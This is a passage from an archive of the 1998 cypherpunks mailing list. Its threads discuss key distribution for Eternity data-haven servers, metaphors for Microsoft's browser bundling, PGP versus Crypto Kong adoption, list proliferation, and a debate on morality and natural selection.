Message-ID: <199801151544.JAA05496@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Ryan,

Thanks for the clarification. I've added a few issues that have occured to
myself and Doug Floyd (operator of the dh-l mailing list) during several
short discussions we've had over the last year.

Forwarded message:

> Subject: Re: how to release code if the programmer is a target for coercion (fwd)
> From: Ryan Lackey <rdl@mit.edu>
> Date: 15 Jan 1998 05:19:25 -0500

> The problem reduces to one of distribution of public keys.

Agreed.

>  In my model
> (er, actually Lenny Foner's model, in this case), you distribute something
> that has intrinsic verifiability -- the eternity source.

If I understand this you mean to use the code itself as the key?

So you require all the eternity servers to use the same source? Doesn't this
imply at some point a single point of distribution and hence another point
of attack?

>  So whether
> or not rdl's eternity-dds signing key is compromised is irrelevant to
> the users -- in fact, the assumption is that since I am a known target,
> I've been killed or compromised.  So, there's this potentially untrusted
> code out there.

I am unclear as to what you mean by 'known target', are you refering to a
particular eternity server, the eternity server code itself, the document the
user is looking for, or the provider of the document? I suspect the provider
of the document. Doesn't the fact that you can't address issues of key
validity become an issue? How does this model handle key aging or do you
propose to leave the same keys out there for extended periods of time (ie
decades after your death)? Doesn't this extended lifetime represent a threat
to the validity of the keys since it provides mallet an exceptional period
of time in which to mount the attack? Especialy since nobody is checking the
keys?

It further seems to me that the main motive of most law enforcement is going
to be going after the user of the data the majority of the time since this
is much more time critical than knowing who provided the data. After all
simply knowing who did the original sourcing is not enough to remove the
problem after the fact. Eternity servers are after intended to be long lived
mechanism, this provides the authorities much time to follow the data and
analyze the network traffic. Wouldn't it be important to provide some sort
of delivery mechanism that provides a full encryption envelope around the
data until it is delivered to alice? I recognize this exacerbates instead of
alleviates the key server security issues.

> People who have known public keys then inspect and sign the code.  It is
> assumed these people have distributed their public keys far and wide, signed
> by lots of people, etc.  As long as you can assume the "PGP web of trust",
> the distributed software signing thing works.

Ah, ok. So we again are assuming everyone is using the same particular piece
of technology. In this model, would it not add security to the mechanism to
have the eternity server deliver the encryption software (ie PGP)? How does
this model handle the physical contact that is required in the PGP web of
trust? In particular how does it verify that the actual physical contact
occured?

Can you address the key distribution mechanism and how it addresses the
issue of a mallet producing their own key server with their own keys signed
sureptitiously by their own multiplicity of 'nyms? Do you see a group of
'Johny Appleseeds' roaming the country in person dropping little dolops of
signed keys off? Or, do you believe some sort of key verification service
will need to be generated that compares keys for individual 'nyms on the
various servers and publishes a list of keys that don't match (something
that would to my thinking be prime data for a data haven server). Doesn't
such a 'trusted' service have the same sort of 'user end' threats as the
eternity servers themselves?

Assume for a moment that mallet wants to monitor a particular alice. Alice
makes her request which goes through mallets tap. Outbound traffic is
uneffected so that the actual keys sent to the server are good. However, no
the return stroke mallet intercept the traffic, provides their own bogus
keys and signed document. How do you see alice finding a way to recognize
this? The threat with this model is that alice might be turned and therefore
condemn any co-participants in whatever activity alice is supposed to be
involved in (eg ingesting lettuce or leading a freedom cell in Burma)?

> I agree that the current state of PGP use is probably not enough for
> the "PGP web of trust" -- I've *never* used a key and found it signed by
> anyone I know.  However, I think even the current system puts a pretty high
> barrier to fraud, and if there started to be fraud, people would start
> signing each other's keys.

I agree with all the points but the last. When the cost becomes too high
(ie inconvenient) they simply won't use it. I just can't seem to grasp why
people would spend even more money (which would provide a flag via
monitoring of funds) to physicaly meet a group of others who they probably
don't know and therefore probably shouldn't trust at such a fundamental
level.

> A keyserver serving keys like "rdl's eternity-dds release signing key" might
> be subject to traffic analysis, true. However, as you suggest, you could
> put the keyserver inside Eternity.  Then, the problem just gets shifted -- now
> you need (a) pgp signing key(s) which has/have signed all of those keys.

I believe it is a fundamental mistake to have the key server inside the
eternity server, just as I object to anonymous remailers that provide such
service. The key servers should be on different machines to provide physical
independance & legal indipendance - these are long lived keys after all and
there is no reason architecturaly to put the keys at threat if the data
haven is at threat, and finaly technological indipendance - it should not
require a upgrade of the eternity software (and visa versa) to upgrade the
key server software.

Another issue that was raised previously, neither I nor anyone else
addressed it at the time, is this acceptance of latency of distribution.
Since we are talking about providing potentialy damaging documents (to who
is intentionaly left vague) doesn't this latency provide opportunities for
attack? Unlike a remailer network where it defeats traffic analysis in the
data haven model it seems like a perfect means to get the processing window to
actualy mount a trace.

Anyway, since I am still about 3-6 months from actualy implimenting any of
my own Plan 9 based (network level anonymity) model this is all conjecture.
Hope it provides at least a seed for something useful.

Ta ta.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 23:18:06 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Microsoft Metaphors (fwd)
Message-ID: <199801151547.JAA05542@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 15 Jan 1998 10:09:09 -0500
> From: Declan McCullagh <declan@well.com>
> Subject: Microsoft Metaphors

> What are the best metaphors to use when talking about a browser and an
> operating system? Is the combination like a car and an engine, or a car and
> a roofrack? A pair of gloves?

It seem to me to be like a car and a road map. It simply lets you address
the multiplicity of resources (ie destinations) out there in a convenient
model.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 16 Jan 1998 01:58:21 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: Microsoft Metaphors
In-Reply-To: <v03007808b0e3d6ab4a0f@[204.254.22.155]>
Message-ID: <v03102801b0e3fbb08344@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:09 AM -0800 1/15/98, Declan McCullagh wrote:
>What are the best metaphors to use when talking about a browser and an
>operating system? Is the combination like a car and an engine, or a car and
>a roofrack? A pair of gloves?
>
>Or is it even useful to talk about a browser/OS metaphor in the case of
>Microsoft, since IE has been glued into the operating system in the form of
>.DLLs? Might that be more like the wheels of a car?

I think this is one of those cases where metaphors mislead. They cause more
confusion than they lessen confusion.

(I was thinking about the "car + navigation system" metaphor, which someone
I think proposed, and how a car company is supplying a map/Etak, but other
map makers want the Justice Department to force the car maker to remove
their map/Etak, and so on.... but any browser-ignorant reader, presumably
the target for your metaphor, will be misled.)

My advice: Skip the misleading metaphors and simply describe what the Web
is (duh!), what a browser is, and what Microsoft is bundling with their OS.

Anybody who by now doesn't know what these three items are is too stupid to
grasp metaphor, anyway.

(Unless it's this: "Like, think of a beer company. The company wants to
include a can opener with the beer. Like, they even want to include an
automatic opening thing they call a "pop-top." Netscape, a maker of can
openers, wants the Justice Department to force Microsoft to remove this
pop-top feature so that more people wil have to buy their can opener.")

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 23:26:47 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: FBI to search school shooters computer [CNN]
Message-ID: <199801151554.JAA05676@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>              SUSPECTED HIGH SCHOOL GUNMAN TO MAKE COURT APPEARANCE
>                                        
>   FBI will search his computer for evidence of motive
>   
>      January 15, 1998
>      Web posted at: 9:36 a.m. EST (1436 GMT)
>      
>      PADUCAH, Kentucky (CNN) -- The teen-age suspect in last month's
>      Kentucky school shooting was scheduled to make his first public
>      court appearance Thursday morning, as the FBI announced plans to
>      search the contents of his personal computer.
>      
>      Michael Carneal, 14, is accused of opening fire on an informal
>      prayer group in the lobby of Heath High School, where he was a
>      freshman. Three students were killed and five wounded in the
>      December 1 attack.
>      
>      Carneal was indicted as an adult on three counts of murder, five
>      counts of attempted murder, and one count of burglary. The
>      commonwealth's prosecutor has said he'll pursue the maximum penalty
>      of life in prison, which would mean Carneal, if convicted, would
>      have to serve 25 years before he could be considered for parole.
>      
>      In a search for a possible motive into the deadly shootings, the FBI
>      has agreed to search the contents of Carneal's personal computer.
>      Lobby Heath High School lobby where the shooting occurred 


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 15 Jan 1998 23:14:08 +0800
To: cypherpunks@cyberpass.net
Subject: Microsoft Metaphors
Message-ID: <v03007808b0e3d6ab4a0f@[204.254.22.155]>
MIME-Version: 1.0
Content-Type: text/plain



What are the best metaphors to use when talking about a browser and an
operating system? Is the combination like a car and an engine, or a car and
a roofrack? A pair of gloves?

Or is it even useful to talk about a browser/OS metaphor in the case of
Microsoft, since IE has been glued into the operating system in the form of
.DLLs? Might that be more like the wheels of a car?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@iq.org>
Date: Thu, 15 Jan 1998 08:07:24 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Crypto Kong penetration.
In-Reply-To: <199801142049.MAA02259@proxy4.ba.best.com>
Message-ID: <wx3eiqps5o.fsf@polysynaptic.iq.org>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" <jamesd@echeque.com> writes:

>     -- 2
> Since release there have been a very large number of hits on
> the Kong documents, and mere 102 downloads of the program,
> and 74 downloads of the source code.
> 
> The large number of source code downloads indicates that I am
> only reaching the crypto techie audience, that for the most
> part is already able to use PGP, not the non tech audience
> that Crypto Kong was designed for.
> 

My first recomendation would be to change the name. Quickly.

Cheers,
Julian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@beast.brainlink.com>
Date: Thu, 15 Jan 1998 23:22:20 +0800
To: cypherpunks <cypherpunks@toad.com
Subject: FW: IRS/Co$ Secret Agreement web page (fwd)
Message-ID: <Pine.SUN.3.96.980115102121.4401D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



-----Original Message-----
Subject:        IRS/Co$ Secret Agreement web page

http://www.primenet.com/~cultxpt/irs-cos.htm

   The IRS gave the Church of Scientology a sweetheart deal on October
1 1993, granting it privileges that no other tax exempt organization
gets.
   The above web page  includes the Secret Agreement, IRS tax code
portions at issue, US Supreme Court ruling that the Secret Agreement
violates, and other important information.  I update it almost daily.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 16 Jan 1998 02:47:18 +0800
To: Steve Mynott <steve@tightrope.demon.co.uk>
Subject: Re: Crypto Kong penetration.
Message-ID: <199801151836.KAA13648@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 05:31 PM 1/15/98 +0000, Steve Mynott wrote:
> Ummm why reinvent the PGP wheel

Well I am not "reinventing the wheel".

Crypto Kong implements a different identity model.  It does
not suppose that there are "true names".

This leads to substantially easier identity management
(largely by abolishing identity management)

As a necessary consequence of this, if you happen to be
communicating with two different Bob Jones, Crypto Kong does
not attempt to discover which one is the one true Bob Jones
and which is the evil man in the middle Bob Jones.  It merely
keeps them distinct by applying different labels to them.

Secondly, PGP simply is not being adopted by the masses.  Of
course right now, two weeks after release, Crypto Kong is not
being adopted by the masses either, but with very little
identity management, it is far easier for the masses to use.

If you try and shove that identity stuff onto people they
will not do it.  Too much like hard work.  They will happily
let the government licensed authorities do it for them.  The
PGP model clearly has not flown yet, and it is not going to
fly.


    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     mMObRqZXvGz3OkHZyNWBCEGt5ZpZtUG5Y19i3tsX
     4SfFX2/pUCYwhAm6n1u5xBLG/xL9LYsSZcznxXI8S
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Porter <txporter@mindspring.com>
Date: Fri, 16 Jan 1998 00:11:38 +0800
To: cypherpunks@cyberpass.net
Subject: re: Microsoft Metaphors
Message-ID: <19980115110105.55216@vasili.rlf.org>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Jan 15, 1998 at 10:09:09AM -0500, Declan McCullagh thoughtfully expounded:
> What are the best metaphors to use when talking about a browser and an
> operating system? Is the combination like a car and an engine, or a car and
> a roofrack? A pair of gloves?
> 
> Or is it even useful to talk about a browser/OS metaphor in the case of
> Microsoft, since IE has been glued into the operating system in the form of
> .DLLs? Might that be more like the wheels of a car?

I might look at it like air conditioning in a car:  If present, it requires
significant alterations to the basic vehicle, and might be difficult to remove
cleanly, _but_ air conditioning in no way affects the basic operation of the
car, and cars can be bought without air conditioning.

Hmmmmm, actually A/C does affect the car's operation: uses more gas and 
degrades performance!  A better metaphor than I thought.

-- 
Tom Porter                                       txporter@mindspring.com
------------------------------------------------------------------------
   "I do believe that where there is a choice only between cowardice and
    violence, I would advise violence." Mahatma Gandhi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Ritter <dritter@bbnplanet.com>
Date: Fri, 16 Jan 1998 00:33:08 +0800
To: Jim Choate <cypherpunks@ssz.com>
Subject: Re: Microsoft Metaphors (fwd)
In-Reply-To: <199801151547.JAA05542@einstein.ssz.com>
Message-ID: <3.0.3.32.19980115112603.006c5c00@pobox3.bbn.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:47 AM 1/15/98 -0600, Jim Choate wrote:
>
>Forwarded message:
>
>> Date: Thu, 15 Jan 1998 10:09:09 -0500
>> From: Declan McCullagh <declan@well.com>
>> Subject: Microsoft Metaphors
>
>> What are the best metaphors to use when talking about a browser and an
>> operating system? Is the combination like a car and an engine, or a car and
>> a roofrack? A pair of gloves?
>
>It seem to me to be like a car and a road map. It simply lets you address
>the multiplicity of resources (ie destinations) out there in a convenient
>model.

A browser is a piece of software. How it is implemented has no effect on
what it
is: a tool used by people, running on a computer with an OS.

The computer is a building. The OS makes it a supermarket. The browser is the
map of the store showing what foods are in what aisles.

-dsr-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 16 Jan 1998 01:07:50 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Microsoft Metaphors (fwd)
Message-ID: <199801151730.LAA05952@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Dan,

Forwarded message:

> Date: Thu, 15 Jan 1998 11:26:03 -0500
> From: Dan Ritter <dritter@bbnplanet.com>
> Subject: Re: Microsoft Metaphors (fwd)

> The computer is a building.

A building once built doesn't change and it's a pain in the ass to change
the rooms and such. A general purpose stored program computer is
intentionaly designed to get around these limitations. Computers before the
stored program paradigm most certainly fit the building model however.

> The OS makes it a supermarket.

The OS provides a multiplicity of resources for me to use (purchase) at my
leisure? I don't think so, unless you want to model the user as the company
that loads the shelves. In a computer, unlike a store, each time I want to
use a jar of tomato paste (program) to build lasagna (job) I don't have to go
out and buy a new jar of tomato paste.

> The browser is the map of the store showing what foods are in what aisles.

That one I'll buy (figuratively).


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 16 Jan 1998 03:48:22 +0800
To: Ray Arachelian <sunder@sundernet.com>
Subject: Re: Crypto Kong penetration.
Message-ID: <199801151940.LAA08293@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
On Thu, 15 Jan 1998, James A. Donald wrote:
>> If you try and shove that identity stuff onto people they 
>> will not do it.  Too much like hard work.  They will 
>> happily let the government licensed authorities do it for 
>> them.  The PGP model clearly has not flown yet, and it is 
>> not going to fly.

At 02:16 PM 1/15/98 -0500, Ray Arachelian wrote:
> IMHO, this is pure grade A bullshit.  If you included PGP 
> in MsMail, and Eudora and pine and elm from the get go, 
> everyone would use it.

Proven false by experiment:  Observe what happened with 
Verisign and MIME.

The cost is not signing your stuff.  The cost is setting up a 
key and publishing it, and getting other peoples keys and 
verifying them.

Integration with Eudora makes it trivial to sign and to 
decrypt, *after* you have created and uploaded a key, and 
downloaded and verified other peoples keys, which is not 
trivial.

People would rather the kindly benevolent government did that 
hard stuff for them.

Verisign/MIME is *already* integrated into everyone's
mailers, and they are not using it because Verisign key
management is too hard, and Verisign key management is
arguably more user friendly than PGP key management, though
clearly less user friendly than Crypto Kong's (lack of) key
management.




    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     s/7IS+OXDf+elZBg6ff+1Sq4aO4aoy9DRhH58rhP
     4HFsRTnHTjnMnwGwjenI4jPJsM/0cy02LwoJAtbQ8
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Fri, 16 Jan 1998 01:14:51 +0800
To: Dan Fabulich <daniel.fabulich@yale.edu>
Subject: Re: (eternity) God's Own Backup Medium
In-Reply-To: <3.0.1.32.19980114172242.006bb0e0@dgf4.mail.yale.edu>
Message-ID: <199801151705.MAA03621@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Dan Fabulich:
> I must be insane, because this seems simple to me.  Don't listen.

It's simple conceptually, just some of the technical details are
multi-axis tradeoffs which need to be made explicit.
> 
> Presume that the goal is a secure anonymous storage/retrieval system, paid
> for with e$.  Armed with a persistent naming system for each document, we
> set up e$ protocols to pay for storage of a (possibly encrypted) document
> OR to pay for retrieval of a particular named document.  I broadcast that I
> want up to ten people to store my XMB document and that I'm prepared to pay
> $Y/mo. to each participant.  My document is then secure for as long as I'm
> prepared to pay for it.  It is anonymous to the extent that information can
> be transferred anonymously between me and the other willing participants;
> it is therefore a remailer problem, not an Eternity problem.

It's an Eternity problem if you want your eternity system to have
better performance than the remailers have.  What you really need
is a multi-level security infrastructure, where someone (the owner
of the data, the individual intermediate server operators, etc.) can
choose the level of security they will provide to meet certain 
Quality of Service levels.

Yes, for a lot of the data you're handling, remailers are a good model.
However, steganographically-protected streams hidden inside other streams
work better for certain things.  Perhaps quantum channels work better for
other things.  Perhaps hand-carried optical tapes are best for others.  
The system should have a way of handling these formats in a suitably
abstract way.

> Alternately, if a document is in high demand, someone might offer money to
> anyone who can provide a particular document given by name.  Any willing
> sellers could then exchange information/e$ via e-mail.  (One might even
> imagine data-traders who would seek out valuable information at a bargain
> and sell them to others at market value.)  Again, the mechanism is only
> anonymous to the extent that e-mail is secure.

Which helps both security and performance.  A very good mechanism.
> 
> Note that the system is profitable to all of its participants no matter
> WHAT the broadcast mechanism is.  The more automation, the more profitable.
>  The more participants, the more profitable.  The more information online,
> the more profitable.

Yes.  That's why I'm including market-based techniques in Eternity DDS --
I think market-based arguments are as powerful as statistical ones --
perhaps not as powerful as mathematical/cryptographic proof, but
close.

> The missing link here, of course, is anonymous e$.  Despite the success of
> the remailers, I've never been convinced that they're not vulnerable to
> traffic analysis.  (Possibly this is why no one has ever bothered to shut
> them down?)
> And even if we COULD set up automated daemons to monitor the broadcasts and
> negotiate trades, there's still no good way to distribute money over the net.

I know with high confidence there will be a deployed quality anonymous
e$ system in 1998.
> 
> At any rate, keeping the system independent of its broadcast medium (which
> can be done pretty easily by just making sure that the program communicates
> in [encrypted] plaintext,) should make the system autocatalytic...  At that
> point, just let it run, get as many people running it as possible and let
> the market take over.

Yes.  Both Eternity-USENET and Eternity DDS are only secure once they
grow to a certain size.  Market pressure is (I think) the best way of
getting a system to scale to that size.

(Eternity-USENET is vulnerable to technical Denial of Service attacks
with the current small number of indexing servers, even if it is protected
from legal issues.  I think illegal or extralegal attacks are as dangerous
as the legal ones)


-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 16 Jan 1998 04:15:36 +0800
To: "James A. Donald" <steve@tightrope.demon.co.uk>
Subject: Re: Crypto Kong penetration.
In-Reply-To: <199801151836.KAA13648@proxy3.ba.best.com>
Message-ID: <v03102802b0e41b78fa92@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:36 AM -0800 1/15/98, James A. Donald wrote:

>Secondly, PGP simply is not being adopted by the masses.  Of
>course right now, two weeks after release, Crypto Kong is not
>being adopted by the masses either, but with very little
>identity management, it is far easier for the masses to use.
>
>If you try and shove that identity stuff onto people they
>will not do it.  Too much like hard work.  They will happily
>let the government licensed authorities do it for them.  The
>PGP model clearly has not flown yet, and it is not going to
>fly.

James Donald needs to be arrested.

Or at least be threatened with prosecution.

I am persuaded that a big, big reason for PGP's success was the threatened,
looming prosecution of Phil Zimmemann by forces of the Evil Empire. The
many news stories, favorable magazine profiles, and general publicity all
caused PGP to be adopted as a kind of "Blue Ribbon Campaign" (a la the CDA).

The fact is that most people don't see the need to either secure their
messages against eavesdroppers or to sign their messages. But PGP was
"cool" and rode the same wave that "Wired" rode.

The recent corporatization of PGP, with the mandatory voluntary inclusion
of key recovery features in 5.5, and the purchase of PGP, Inc. by Network
Associates all signal big changes in this "little guy" image.

How successful PGP will be in the future depends on a bunch of factors, but
the "coolness" factor has certainly disappeared almost completely.

If James Donald wants some similar publicity for Donkey Kong, er, Crypto
Kong, then he'll have to arrange some similar publicity stunts. Otherwise
it will languish in obscurity.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 16 Jan 1998 04:23:42 +0800
To: Ryan Lackey <cypherpunks@ssz.com
Subject: Re: (eternity) Mailing List Archives
In-Reply-To: <199801151939.OAA01030@the-great-machine.mit.edu>
Message-ID: <v03102803b0e41daa7eaa@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:39 AM -0800 1/15/98, Ryan Lackey wrote:

>I've put the archives of the Eternity Mailing List (eternity@internexus.net)
>up on http://sof.mit.edu/eternity/mail-archive/
>
>The mailing list is host to discussion of the theoretical issues behind
>Eternity service, Blacknet, Adam Back's Eternity USENET implementation,
>and my forthcoming Eternity DDS implementation.
>
>(7 articles got lost from the archive while I was setting it up.  I sent
>them to itself as "missing articles 86-92".  I'll restore their
>original headers at some point.)

Thanks for doing this.

But I'll point out that I choose to continue to use the Cypherpunks list,
as I have since 1992, as the main forum for my own comments. If anyone
wants to read my stuff, they are encouraged to subscribe to the Cypherpunks
list.

I think list proliferation has gotten way, way out of hand. It seems that
any time a topic becomes hot, someone decides it needs its own mailing
list. Then, as it becomes not quite so hot, volumes drop off the radar
screen and the list essentially vanishes.

(Any besides me remember the lists devoted to DC Nets? The list "Digital
Anarchy"? The list "Digital Liberty"? The "Nym" list?)

We have a dozen or so lists all ostensibly covering much the same material,
such as Coderpunks, Cryptography, Fight-Censorship, PoliLaw (or somesuch),
e$spam, Remailer Operators, Eternity, and probably half a dozen others I
have no awareness of, or have forgotten here.

Worse, some of these are moderated.  (I make it a point not to subscribe to
moderated lists unless the reasons are compelling.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 16 Jan 1998 05:01:38 +0800
To: Wayne Radinsky <waynerad@oz.net>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <01BD2130.FFFF2520@sense-sea-pm6-7.oz.net>
Message-ID: <199801152052.MAA08971@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain





philosophers have struggled with what is moral since the beginning
of civilization. at least they are struggling with the question.
each new civilization and era gives a new answer to the question,
"what is morality", and hopefully each is more evolved than the
last, unless humanity is regressing. "what is morality" is obviously
something that cannot be settled in cyberspace, it hasn't even
been settled by great writers, and there are only mediocre and
borderline insane minds in cyberspace <g>

>The reason morality is impossible to nail down is because it does not exist al 
>all in any absolute sense, at least as far as science is concerned.  If you dec
>lare, for example, that "murder" is "wrong" you are always left with dilemmas, 
>such as whether soldiers who kill during a war are doing something "wrong".

dilemmas do not prove a concept does not exist. there are pretty clear cut
cases, and less well clear cut cases. those that have difficulty with the
concept of morality will tend to focus on the fuzzy cases and conclude
that the whole exercise is a waste of time.

>According to the principle of natural selection, all people, including scientis
>ts, exist purely to maximize their own inclusive genetic fitness.  "Fit" means 
>that an organism is well adapted to it's environment, so "maximizing inclusive 
>genetic fitness" means having the maximum number of offspring which are themsel
>ves fit.

natural selection does however support the idea of altruism. natural
selection does not require each individual seek survival. various aspects
of the genetic code that lead to survival of the species are what are
truly favored. a breed of animals that does nothing but try to kill
each other off leads to a situation where each individual is maximizing
the odds of its own DNA propagating, no? but how long would such a 
species survive? and extra credit, to what "animal" am I actually
alluding to here?

>The underlying reason people benefit by promoting themselves as moral people, i
>n general, is because of the benefit of what evolutionary psychologists call re
>ciprocal altruism.  With reciprocal altruism, both parties benefit if they are 
>in a non-zero-sum situation.  Because most situations are non-zero-sum and the 
>benefits are so great, everyone has a stake in promoting themselves as a good r
>eciprocal altruist, in other words, a good, trustworthy, moral person.  This is
> how natural selection explains the existence of the concept of "morality".

natural selection is relevant among species that have no intelligence
or intellectual control over their own destiny. it is only relevant to
humans insofar as we wish to behave like animals.

>So it is a myth that scientists live to find deep truths or to benefit humanity
>.  They may do those things, but their real goal is maximizing their own inclus
>ive fitness. 

false, even by your own reasoning, because a scientists DNA does not 
necessarily lead to more scientist DNA. sons and daughters of scientists
may be  anything they wish to be in a free country.

>The only way out is to believe in the afterlife, and religion, and that life ha
>s meaning beyond the genes and material world. Doing so doesn't make moral dile
>mmas go away, and you never know, people may just be believing such things for 
>the benefit of genes, after all natural selection has no real concern for "trut
>h".

natural selection among animals. and a pretty scary mind that would 
consider us on that level. I agree there are some vague parallels for
human development. but humans do not have children in the mindless way
that animals breed, nor hopefully do they live their lives according
only to evolutionary instincts, but of course letters like yours tend
to make me wonder, and I'm being deliberately ambiguous here by what
I mean by that <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 16 Jan 1998 05:11:33 +0800
To: Blanc <blancw@cnw.com>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.5.32.19980114191915.007f5990@cnw.com>
Message-ID: <199801152104.NAA11122@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>
>Of course, if people were more moral, we would have institutions which
>reflected that integrity.  The problem is, how could they be made to become
